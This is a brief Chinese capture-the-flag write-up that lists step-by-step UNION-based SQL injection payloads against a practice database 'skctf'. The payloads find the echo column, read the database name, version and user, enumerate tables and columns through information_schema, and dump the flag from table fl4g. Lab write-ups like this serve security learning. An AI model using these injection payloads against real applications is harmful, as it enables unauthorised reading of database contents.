目录
判断回显位置
查看数据库名、版本号、用户
查看skctf数据库中的表名
查看fl4g表中的字段名
查看skctf_flag字段中的字段值
判断回显位置
11111' union select 1,2,3,4 #
查看数据库名、版本号、用户
11111' union select 1,database(),version(),user() #
查看skctf数据库中的表名
11111’ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema =’skctf’ #
查看fl4g表中的字段名
11111' union select 1, group_concat(column_name),3,4 from information_schema.columns where table_name = 'fl4g' #
查看skctf_flag字段中的字段值
11111' union select 1, group_concat(skctf_flag),3,4 from fl4g #